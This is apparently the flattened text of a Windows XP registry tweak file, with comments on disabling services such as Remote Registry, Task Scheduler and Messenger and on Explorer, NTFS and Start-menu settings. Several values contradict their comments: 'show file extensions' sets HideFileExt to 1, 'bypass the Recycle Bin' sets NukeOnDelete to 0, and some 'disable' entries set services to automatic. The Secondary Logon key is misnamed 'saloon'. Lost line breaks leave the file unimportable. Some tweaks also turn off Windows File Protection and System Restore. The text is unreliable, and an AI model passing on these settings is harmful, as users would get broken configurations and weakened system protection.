;Disable Upload Manager Service , Manages synchronous and asynchronous file transfers between clients and servers on the network. If this service is stopped, synchronous and asynchronous file transfers between clients and servers on the network will not occur. If this service is disabled, any services that explicitly depend on it will fail to start. This service sends driver information to Microsoft to track availability of driver information. This service is not required for basic File and Print sharing. I do not have yet to find a need for this service, nor do I wish to send my hardware information to Microsoft.[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\uploadmgr]"Start"=dword:00000004
;Themes Service ,The themes service is responsible for Visual Styles. Using Microsoft® Windows® XP, you can now define the visual style or appearance of controls and windows from simple colors to textures and shapes. You can control each defined part of a control as well as each part of the non-client (frame and caption) area of a window. The user can then use the Appearance tab in the Windows Control Panel to switch between the classic visual style and other available styles.A visual style is included with the Windows XP release. Using helper libraries and application programming interfaces (APIs),you can incorporate the Windows XP visual style into your application with few code changes. For more information, see the Platform SDK documentation in the MSDN Library.If your memory conscious and does not care about the "new" XP look, disable this service to save RAM. I have observed between 4 MB to 12 MB of RAM used for the new themes.[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Themes]"Start"=dword:00000002
;Disable Protected Storage Service, Provides protected storage for sensitive data, such as private keys, to prevent access by unauthorized services, processes, orusers. Other wise known as auto complete in Internet Explorer. Allows for the saving of local passwords or even web sites information (AutoComplete). This service is set to Automatic by default. Due to security reasons, I recommend leaving this "feature" disabled to make things all that much more difficult to steal vital information if you do not "save" it. On the other hand, you may need this service to manage private keys for ;encryption purposes. If so, leave this service on automatic to ensure the "higher" security settings you choose work. If you disable this service, you will no longer have any of your passwords saved, no matter how many times you click the box. If you enjoy having your passwords saved in applications like Outlook or Dial up networking or you are connecting to the internet via a domain controller/server that requires authentication[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ProtectedStorage]"Start"=dword:00000004
;Disable Fast User Switching Service, Provides management for applications that require assistance in a multiple user environment. This service is responsible for letting you stayed logged in as more than one user. Unless you have many users on a system, you probably do not even need this service to be running. You could benefit, however, greatly if you use this service in conjunction with many users on your local computer to allow switching users without closing all existing applications running under a different account.[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\FastUserSwitchingCompatibility]"Start"=dword:00000002
;Disable Computer Browser Service, Maintains an updated list of computers on the network and supplies this list to computers designated as browsers. If this service is stopped, this list will not be updated or maintained. If this service is disabled, any services that explicitly depend on it will fail to start. Computer Browser service maintains a listing of computers and resources located on the network. This service is not required on a standalone system. In fact, even if you want to browse the network (workgroup or domain) or have mapped network shares as local hard drives, you can still do so. On a large network, one computer is designated the "master" browser and another one is the "backup" browser. All others just announce they are available every 12 minutes to "take over" duties if one of the other computers fail. No lag time is discernable if this service remains disabled on all but one computer. Honestly, I donot even believe one needs to be running. You could, "just in case," but it sure does not need to be running on all computers, all of the time.[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Browser]"Start"=dword:00000004
;Disable Help and Support Service, Enables Help and Support Center to run on this computer. If this service is stopped, Help and Support Center will be unavailable. If this service is disabled, any services that explicitly depend on it will fail to start. This service is required for Microsoft's online (or offline) help documents. If you ever "attempt" to use Help and Support, theservice places itself back into "Automatic" and starts even if you already had this service on disabled.[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\helpsvc]"Start"=dword:00000004
;Disable Task Scheduler Service ,Enables a user to configure and schedule automated tasks on this computer. If this service is stopped, these tasks will not be run at their scheduled times. If this service is disabled, any services that explicitly depend on it will fail to start. You use this service to schedule maintenance, Microsoft Backup sessions, or maybe even Auto Update. I do everything manually, to avoid having this service running all the time. Some third party software may require this service to be active for ;automated functions, such as virus scanners, system maintenance tools, and automatic patch/driver look ups.Take note:BootVis requires Task Scheduler and COM+ Event System to be running if you wish to take advantage of the "optimize system" function. Why may you need this service? It is due to the pre-fetching function built into Windows XP.Another Note: Pre-fetching only occurs on boot up and application start, so if you do not care about a few extra seconds of boot time, do not even bother with it and disable Task Scheduler. On some applications, the pre-fetching feature really does help. Only you candecide whether to use its functionality and if it helps in the performance of your system.[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule]"Start"=dword:00000004
;Set Print Spooler to "Auto" Service Loads files to memory for later printing. Queues up print jobs for later printing. This service is required if you have printers, even if they are network printers. If this does not fit your needs, disable it. You will save about 3.8 MB by making this service go away. Your printers will still be" installed" if you disable this service, but not visible in the printers folder. After restarting Print Spooler, they will re appear and be available for use. I place this service into manual mode and only start it up when printing is required. In manual mode, the service will not automatically start at boot time.[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Spooler]"Start"=dword:00000002
;Disable Secondary Log-on Service ,Enables starting processes under alternate credentials. If this service is stopped, this type of logon access will be unavailable. If this service is disabled, any services that explicitly depend on it will fail to start. Enables starting processes under alternate credentials. I have never found a reason to keep this service running. I have always considered "Alternate Credentials" someone other than me! Not my idea of fun... Really, though, it allows a "limited user" account to start an application or process with higher privileges, such as the Administrator account or another user. You can also have a privileged user start an application or process with limited privileged account. If you right-click a file, the menu will display "Run As" option. If you disable this service, that function will no longer be available.[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\saloon]"Start"=dword:00000004
;Disable Performance Logs & Alerts Service ,Collects performance data from local or remote computers based on preconfigured schedule parameters, then writes the data to a log or triggers an alert. If this service is stopped, performance information will not be collected. If this service is disabled, any services that explicitly depend on it will fail to start. Collect performance data on a schedule and send the information to a log or trigger an alert. This may be a super geek tool, but I feel that the overhead associated with it is not worth the benefit. You decide.[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SysmonLog]"Start"=dword:00000004
; Disable Telephony Service ,Provides Telephony API (TAPI) support for programs that control telephony devices and IP based voice connections on the local computer and, through the LAN, on servers that are also running the service. Controls telephony devices on the local computer. This service is required for dial-up modem connectivity. Note: you may require this service for some direct cable or DSL providers, depending on how they implement their logon process or some AOL functionality, depending on software used. If Dial-up, cable or DSL internet access no longer functions properly with this service disabled, place it into automatic. If you are connecting via a hardware router or gateway, this service is not needed.[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TapiSrv]"Start"=dword:00000004
;Disable Wireless Zero Configuration Service ,Provides automatic configuration for the 802.11 adapters Provides automatic configuration for wireless network devices and connection quality feedback. If you do not have any wireless network devices in use on the local system, disable this service. You may require this service for connectivity with some "hot sync" software for a PDA, laptop or other portable computer.[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WZCSVC]"Start"=dword:00000004
;Disable TCP/IP NetBIOS Helper Service ,Enables support for NetBIOS over TCP/IP (NetBT) service and NetBIOS name resolution. This feature provides legacy support for NetBIOS over TCP/IP. If your network does not use NetBIOS and / or WINS, disable; this function.[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LmHosts]"Start"=dword:00000004
;Disable Remote Desktop Help Session Manager Service ,Manages and controls Remote Assistance. If this service is stopped, Remote Assistance will be unavailable. Before stopping this service, see the Dependencies tab of the Properties dialog box. Manages and controls Remote Assistance. If you do not want or need to use this feature, disable it. In an idle state, this service sucks up 3.4 MB to 4 MB of RAM.[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RDSessMgr]"Start"=dword:00000004
;Disable Routing and Remote Access Service ,Offers routing services to businesses in local area and wide area network environments. Allows computers to dial in to the local computer through a modem (or other devices) to access the local network using a standard or VPN connection. Unless you require this functionality, disable it for security reasons. Upon enabling this service,” Incoming Connections" icon will be available in the "Network Connections" control panel.[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RemoteAccess]"Start"=dword:00000004
;Disable Clip Book Service ,Enables Clip Book Viewer to store information and share it with remote computers. If the service is stopped, Clip Book Viewer will not be able to share information with remote computers. If this service is disabled, any services that explicitly depend omit will fail to start. Used to store information (cut / paste) and share it with other computers. I have never found enough need for this to allow this service to always be running. This service alone uses about 1.3 MB of memory.[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ClipSrv]"Start"=dword:00000004
;Disable Error Reporting Service ,Allows error reporting for services and applications running in non-standard environments. Calls home to Microsoft when application errors occur. I personally do not like this. I feel it is a waste of memory and resources. On the other hand, if you are experiencing system crashes often, the best way to deal with them is to report them using this tool.[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ERSvc]"Start"=dword:00000004
; Disable Indexing Service ,Indexes contents and properties of files on local and remote computers; provides rapid access to files through flexible querying language. This service always has been a major resource hog. I NEVER recommend having this service enabled. Remove the function via the "Add / Remove Programs" icon in the control panel (Windows Setup Programs). It uses about 500 K to 2 MB in an idle state, not to mention the amount of memory and CPU resources it takes to INDEX the drives. I have had people (and witnessed it on other people's computers) report to me that the Indexing Service sometimes starts up EVEN while the systemise NOT idle... as in the middle of a game. You may feel, as I do, that this is unacceptable. If your computer suddenly seems” sluggish," Indexing Service is usually the cause of it.[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\cisvc]"Start"=dword:00000004
;Disable Imapi CD-Burning Service , Manages CD recording using Image Mastering Applications Programming Interface (IMAPI). If this service is stopped, this computer will be unable to record CDs. If this service is disabled, any services that explicitly depend on it will fail to start. This service operates that cool "drag and drop" CD burn capability. You will need this service to burn CD's. What is the goodness? If you set this service to manual, the service starts and stops itself when used with some software packages. This is practically the only service that does do this! If you still cannot burn a CD with it on manual, switch to automatic and feel safe that it starts only when "needed." This service may take up about 1.6 MB of memory in an idle state.[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ImapiService]"Start"=dword:00000004
;Disable Messenger Service (to stop spam. Does not affect MSN or Windows Messenger NOT NEEDED FOR SP2)[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Messenger]"Start"=dword:00000004
;Disable Remote Registry Service ,Enables remote users to modify registry settings on this computer. If this service is stopped, the registry can be modified only by users on this computer. If this service is disabled, any services that explicitly depend on it will fail to start. This feature is not available on Windows XP Home. This is one of those not needed services. One of the first I disable. If you’re paranoid about security, disable this service. Even if you are not or do not care, disable it anyway. DISABLE IT NOW!![HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RemoteRegistry]"Start"=dword:00000004
;Disable SSDP Discovery Service (Universal Plug'n'Play) ,enables discovery of UPnP devices on your home network. Used to locate UPnP devices on your home network. Used in conjunction with Universal Plug and Play Device Host, it detects and configures UPnP devices on your home network. For security reasons and for the fact that I doubt that you have any of these devices, disable this service. If any EXTERNAL device does not function because of this service being disabled, place it back in to automatic. MSN Messenger uses this service in conjunction with supported UPnP devices, to provide support for networks behind a NAT firewall or router. Also, if you are experiencing difficulty connecting to multiplayer games that useDirectX(7,8,9), place this service to automatic and ensure you download all security updates. The problem that I have found with this service is that it broadcasts UDP port 1900 "a lot." If you notice plenty of network activity even though nothing is happening, this service is sometimes the cause. Take note: UPnP is NOT PnP. UPnP is for connectivity on networks via TCP/IP to devices, such as scanners or printers. Your sound card is PnP. Do NOT disable Plug and Play service.[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SSDPSRV]"Start"=dword:00000004
;Disable Universal Plug'n'Play Service ,Provides support to host Universal Plug and Play devices. Used in conjunction with SSDP Discovery Service, it detects and configures UPnP devices on your home network. For security reasons and for the fact that I doubt that you have any of these devices, disable this service. If any EXTERNAL device does not function because of this service being disabled, place it back in to automatic. MSN Messenger uses this service in conjunction with supported UPnP devices, to provide support for networks behind a NAT firewall or router. Also, if you are experiencing difficulty connecting to multiplayer games that use DirectX(7,8,and 9), place this service to automatic and ensure you download all security updates. Furthermore, if you use Internet Connection Sharing and wish to make use of the "allow others to modify this connection" feature, enable UPnP. Take note: UPnP is NOT PnP. UPnP is for connectivity on networks via TCP/IP to devices, such as scanners or printers. Your sound card is PnP. Do NOT disable Plug and Play service.[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\upnphost]"Start"=dword:00000004
;Disable Windows Time Service ,Maintains date and time synchronization on all clients and servers in the network. If this service is stopped, date and time synchronization will be unavailable. If this service is disabled, any services that explicitly depend on it will fail to start. Automatically sets your clock by contacting a server (Microsoft's server by default) on the internet. Great idea if your network connects to the internet 24/7. The Event Log fills up with "cannot find server" messages on a non-dedicated setup, though. After successful synchronizing, this service will not attempt to do it again for 7 days, meanwhile, taking up resources. You may also need Task Scheduler running. You may choose to set your clock manually on a dial up connection, but with a 24/7broadband setup, this could keep you on time for work. Note: as mentioned, "time.windows.com" is the default server for synchronization. For those privacy conscious people that prefer to connect to a government site rather then MS, use ;"time.nist.gov."[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time]"Start"=dword:00000004
;Disable Background Intelligent Transfer Service (needs to be on for SP2 Windows Auto Updates)[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BITS]"Start"=dword:00000003
;Disable System Restore Service (default=2)[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\srservice]"Start"=dword:00000002
;Disable Distributed Link Tracking Client[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TrkWks]"Start"=dword:00000004
;Disable Terminal Services[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]"Start"=dword:00000004
;Disable Smart Card[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SCardSvr]"Start"=dword:00000004
;Disable Smart Card Helper[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SCardDrv]"Start"=dword:00000004
;Disable QoS RSVP[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RSVP]"Start"=dword:00000004
;Disable Remote Access Auto Connection Manager[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RasAuto]"Start"=dword:00000004
;Disable NetMeeting Remote Desktop Sharing[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\mnmsrvc]"Start"=dword:00000004
;Disable WMI-performance adaptor[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WmiApSrv]"Start"=dword:00000004
;=======================================================================; 4 - System Performance Tweaks;=======================================================================
;These NTFS tweaks improve file system performance (Speed up NTFS) Note: these have been reported to cause non-compatibility with DOS/Win9x-based apps/games[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem]"NtfsDisable8dot3NameCreation"=dword:00000001"NtfsDisableLastAccessUpdate"=dword:00000001"Win95TruncatedExtensions"=dword:00000001"Win31FileSystem"=dword:00000000

;Increase IoPageLockLimit (disk cache);Note- Use the following settings depending on your system RAM:;00020000 = 131072 KB (if RAM > 512 MB);00010000 = 65536 KB (if RAM > 256 MB);00008000 = 32768 KB (if RAM > 128 MB);00004000 = 16384 KB (if RAM > 64 MB);00002000 = 8192 KB (if RAM > 32 MB);00001000 = 4096 KB (if RAM < 32 MB)[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management]"IoPageLockLimit"=dword:00020000
;Speeds up copying/moving of zip files (disable windows built in zip functionality)[-HKEY_CLASSES_ROOT\.zip\CompressedFolder][-HKEY_CLASSES_ROOT\CLSID\{E88DCCE0-B7B3-11d1-A9F0-00AA0060FA31}][-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CompressedFolder]
;Speed up opening of My Computer and Explorer[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\stisvc]"Start"=dword:00000004[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]"NoSaveSettings"=dword:00000000[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]"NoNetCrawling"=dword:00000001[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer]"NoRemoteRecursiveEvents"=dword:00000001
;Disable Windows Installer Rollback (faster msi installs, dot.net framework wont install with this tweak activated)[HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer]"DisableRollback"=dword:00000001
;Force DLL To Unload From Memory[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\AlwaysUnloadDLL]@="1"
;Optimize Core System Performance[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management]"DisablePagingExecutive"=dword:00000001
;=======================================================================; 5 - General Settings;=======================================================================
; Disable System Restore ,Value: (00000001 = disabled, 00000000 = enabled)[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore]"DisableSR"=dword:00000001
;Change registered Owner/Organization[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion]"RegisteredOwner"="Kill-a-bee""RegisteredOrganization"="WinXp Customized"
;Launch Browser In a Separate process[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\BrowseNewProcess]"BrowseNewProcess"="Yes"
;Opens 16-bit apps in a separate memory space, this increases stability when dealing with 16-bit apps.[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WOW]"DefaultSeparateVDM"="Yes"
;Recycle Bin Uses 3% of Available Space Rather than 10%[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket]"Percent"=dword:00000003
;Bypass the Recycle Bin"NukeOnDelete"=dword:00000000
;Keyboard Num-Lock on[HKEY_CURRENT_USER\Control Panel\Keyboard]"InitialKeyboardIndicators"="2"
;Remove Shortcut Arrow[HKEY_CLASSES_ROOT\lnkfile]"IsShortCut"=-[HKEY_CLASSES_ROOT\piffile]"IsShortCut"=-[HKEY_CLASSES_ROOT\InternetShortcut]"IsShortCut"=-
;Disable the Desktop Cleanup Wizard[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Desktop\CleanupWiz]"NoRun"=dword:00000001
;Disable USB/CDRom Autorun[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]"NoDriveTypeAutoRun"=dword:000000FF
;Control Panel Classic View[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]"ForceClassicControlPanel"=dword:00000001
;Disable Autorun for all Drive Types[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]"NoDriveTypeAutoRun"=dword:00000091
;Increase the USB Polling Interval[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Class\Usb\0000]"IdleEnable"=dword:00000001
;Opens NFO files with Notepad[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.nfo]"Application"="NOTEPAD.EXE"[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.nfo\OpenWithList]"a"="Explorer.exe""MRUList"="ba""b"="NOTEPAD.EXE"[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.nfo\OpenWithProgids]"MSInfo.Document"=hex(0):
; Disable Error Reporting[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PCHealth\ErrorReporting]"AllOrNone"=dword:00000001"DoReport"=dword:00000000"IncludeKernelFaults"=dword:00000000"IncludeMicrosoftApps"=dword:00000000"IncludeWindowsApps"=dword:00000000"ShowUI"=dword:00000000
; Change Default Search Options (1 = ON, 0 = OFF)
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer]"SearchSystemDirs"=dword:00000001"SearchHidden"=dword:00000001"IncludeSubFolders"=dword:00000001"CaseSensitive"=dword:00000000"SearchSlowFiles"=dword:00000000
;Disable "Search Dog" and use advanced search[HKEY_CURRENT_USER\Software\Microsoft\Search Assistant]"Actor"="""SocialUI"=dword:00000000"UsageCount"=dword:00000000"UseAdvancedSearchAlways"=dword:00000001
;Search All File Types[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ContentIndex]"FilterFilesWithUnknownExtensions"=dword:00000001
;Typing Long File Names In DOS[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor]"CompletionChar"=dword:00000009
;Removes Briefcase, and Rich-Text-Document from New Menu.[-HKEY_CLASSES_ROOT\.bfc\ShellNew][-HKEY_CLASSES_ROOT\.rtf\ShellNew][-HKEY_CLASSES_ROOT\.bmp\ShellNew][-HKEY_CLASSES_ROOT\.wav\ShellNew][-HKEY_CLASSES_ROOT\.zip\CompressedFolder\ShellNew]
;Remove the 'Shortcut to...'[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer]"link"=hex:00,00,00,00
;Turn off system beeps[HKEY_CURRENT_USER\Control Panel\Sound]"beep"="no"
;Show Detailed Info in Device Manager[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment]"DEVMGR_SHOW_DETAILS"=dword:00000001"DEVMGR_SHOW_NONPRESENT_DEVICES"="1"
;Turns off the balloon tips altogether;[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer];"NoSMBalloonTip"=dword:00000000
;scanner or Camera on your desktop when you connect it with the USB cable[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\DelegateFolders\{E211B736-43FD-11D1-9EFB-0000F8757FCD}]@="Scanners & Cameras"
;Disable Windows File Protection (can be done with Nlite)[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]"SFCSetting"=dword:ffffff9d"SFCDisable"=dword:ffffff9d
;Disable Built in Windows CD Burning[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]"NoCDBurning"=dword:00000001
;Make the Windows XP registration with Microsoft unnecessary[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion]"RegDone"="1"
;=======================================================================; 6 - Task Bar and Folder View;=======================================================================
;Hide (remove) ALL System Tray icons
[HKEY_Current_User\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]"NoTrayItemsDisplay"=dword:00000001
;lock taskbar
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]"TaskbarSizeMove"=dword:00000000
;Single click mode
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer]"ShellState"=hex:24,00,00,00,11,28,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\01,00,00,00,0d,00,00,00,00,00,00,00,02,00,00,00
; apps don't steal the focus with pop ups
[HKEY_CURRENT_USER\Control Panel\desktop]"ForegroundLockTimeout"=dword:00030d40
; cmd prompt enhancements: tab key completes path+filenames, UNC checks off
[HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor]"CompletionChar"=dword:00000008"PathCompletionChar"=dword:00000008"DisableUNCCheck"=dword:00000001
; special option in start->run
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]"MemCheckBoxInRunDlg"=dword:00000001
; Do not use Simple File Sharing (does not work in XP HE)
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]"forceguest"=dword:00000000
;Put my computer, my network places, my documents , IE on the desktop
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel]"{20D04FE0-3AEA-1069-A2D8-08002B30309D}"=dword:00000000"{450D8FBA-AD25-11D0-98A8-0800361B1103}"=dword:00000000"{208D2C60-3AEA-1069-A2D7-08002B30309D}"=dword:00000000"{871C5380-42A0-1069-A2EA-08002B30309D}"=dword:00000000
;Remove Shared Documents from My Computer
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]"NoSharedDocuments"=dword:00000001[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]"NoSharedDocuments"=dword:00000001[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\DelegateFolders\{59031a47-3f72-44a7-89c5-5595fe6b30ee}][HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
;Clear recent documents when you log-off
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]"ClearRecentDocsOnExit"=dword:00000001
;Won't check if you are low on disk space and pop up a balloon telling you, No Instrumentation disables windows user tracking and cause the recent used programs from the start menu to stop functioning
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]"NoLowDiskSpaceChecks"=dword:00000001"NoInstrumentation"=dword:00000001
;Hard Disk Free Space Warning Value: 0 - 99 percent (Default is 10)
[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanServer\Parameters]"DiskSpaceThreshold"=dword:00000005
;Enable Windows 2000 File Sorting Method[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]"NoStrCmpLogical"=dword:00000001
;cached "folder-view settings", currently 250 (to speed-up browsing local folders)
[HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell]"BagMRU Size"=dword:000000FA[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam]"BagMRU Size"=dword:000000FA
;Caching thumbnails settings
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer];"ThumbnailSize"=dword:00000020"ThumbnailQuality"=dword:0000001E
;Display drives in longhorn mode;0 = windows default;1 = only network drive's letters shown.;2 = no drive letters shown;4 = all drive letters shown
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer]"ShowDriveLettersFirst"=dword:00000002
; Change Drive name and icon You have to change the \C\ below to the drive you want to change
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\DriveIcons\C\DefaultLabel]@="Local OS"[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\DriveIcons\C\DefaultIcon]""="c:\icons\myicons.dll,4"
;Show protected operating system files
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden]"DefaultValue"=dword:00000001[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]"ShowSuperHidden"=dword:00000001
;Status bar, list view for Explorer
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Streams]"Settings"=hex:09,00,00,00,03,00,00,00,00,00,00,00,e0,a5,1f,0e,73,35,cf,11,ae,\69,08,00,2b,2e,12,62,04,00,00,00,04,00,00,00,43,00,00,00
;Icon view for Explorer
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Streams]"Settings"=hex:09,00,00,00,01,00,00,00,01,00,00,00,e0,d0,57,00,73,35,cf,11,ae,\69,08,00,2b,2e,12,62,04,00,00,00,04,00,00,00,43,00,00,00
;Display detail on windows explorer
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Streams]"Settings"=hex:08,00,00,00,04,00,00,00,01,00,00,00,00,77,7e,13,73,35,cf,11,ae,\69,08,00,2b,2e,12,62,04,00,00,00,10,00,00,00,43,00,00,00
;Remove the Logoff Button
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]"StartMenuLogoff"=dword:00000000[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]"StartMenuLogoff"=dword:00000000
;Show logoff button on new start menu
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]"StartMenuLogoff"=dword:00000001
;Show logoff button on classic start menu
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]"StartMenuLogoff"=dword:00000000
;Force Start Menu Logoff Button - Meaning You Cant Disable It
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]"ForceStartMenuLogoff"=dword:00000001[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]"ForceStartMenuLogoff"=dword:00000001

; Enable Cascading of various special folders on Start Menu"ClassicViewState"=dword:00000001
;----- Start menu Items: Hide/Show/Cascade;----- dword:00000000= Don't display this time;----- dword:00000001= Display as a link;----- dword:00000002= Display as a menu (Cascade)"Start_ShowControlPanel"=dword:00000002 ; Display Control Pannel as a menu"StartMenuFavorites"=dword:00000002 ; Show Favorites Menu"Start_ShowHelp"=dword:00000001 ; Show Help and Support link"Start_ShowMyComputer"=dword:00000002; Display My Computer as a menu"Start_ShowMyDocs"=dword:00000002; Display My Documents as a menu"Start_ShowMyMusic"=dword:00000000; Don't display My Music this time"Start_ShowMyPics"=dword:00000000; Don't display My Pivtures this time"Start_ShowNetConn"=dword:00000001; Display Network Conn. as a link"Start_ShowPrinters"=dword:00000001; Show Printers and Faxes as a link"Start_ShowRun"=dword:00000001; Display Run Command"Start_ShowSearch"=dword:00000001; Display Search Command

;Show file extensions
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]"HideFileExt"=dword:00000001
;Show Hidden Files and Folders (1= Do not Show)
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]"Hidden"=dword:00000002
; Hide Protected OS files (1= Show)
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]"ShowSuperHidden"=dword:00000000
;display contents of system folders and C:\ (protected folder)
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]"WebViewBarricade"=dword:00000001
;Disable thumbnail caching
